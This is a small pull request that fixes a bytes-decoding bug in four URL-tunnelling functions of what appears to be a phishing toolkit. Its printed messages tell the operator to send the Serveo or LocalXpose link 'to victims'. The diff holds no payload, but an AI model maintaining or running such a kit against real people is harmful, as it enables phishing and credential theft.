### PR TITLE
Fix #484

### DIFF
--- a/Defs/Actions.py
+++ b/Defs/Actions.py
@@ -436,7 +436,7 @@ def customLocalxpose(port):
     try:
         output = check_output(
             "grep -o '.\{0,0\}https.\{0,100\}' link.url", shell=True)
-        url = str(output).decode("utf-8")
+        url = output.decode("utf-8")
         system('clear')
         print('''
         {1}_  _ . ___  ___  ___ _  _  {0}___ _  _ ___{1}
@@ -469,7 +469,7 @@ def randomLocalxpose(port):
     try:
         output = check_output(
             "grep -o '.\{0,0\}https.\{0,100\}' link.url", shell=True)
-        url = str(output.decode('utf-8'))
+        url = output.decode('utf-8')
         print("\n{0}[{1}!{0}]{1} SEND THIS LOCALXPOSE URL TO VICTIMS-\n\n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}\n{0}[{1}*{0}]{1} LOCALXPOSE URL: {2}{4}{1}".format(
             MAIN0, MAIN4, MAIN3, port, url) + "{1}".format(MAIN0, MAIN4, MAIN3))
         print("\n")
@@ -519,7 +519,7 @@ def customServeo(port):
     try:
         output = check_output(
             "grep -o '.\{0,0\}http.\{0,100\}' link.url", shell=True)
-        url = str(output).decode("utf-8")
+        url = output.decode("utf-8")
         system('clear')
         print('''
         {1}_  _ . ___  ___  ___ _  _  {0}___ _  _ ___{1}
@@ -552,7 +552,7 @@ def randomServeo(port):
     try:
         output = check_output(
             "grep -o '.\{0,0\}http.\{0,100\}' link.url", shell=True)
-        url = str(output).decode("utf-8")
+        url = output.decode("utf-8")
         print("\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO VICTIMS-\n\n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}\n{0}[{1}*{0}]{1} SERVEO URL: {2}".format(
             MAIN0, MAIN4, MAIN3, port) + url + "{1}".format(MAIN0, MAIN4, MAIN3))
         print("\n")


### PR DESCRIPTION
Decode() is a method that acts on instances of the class bytes returns an instance of the class str. There is no need to cast 'output' as str before decoding it.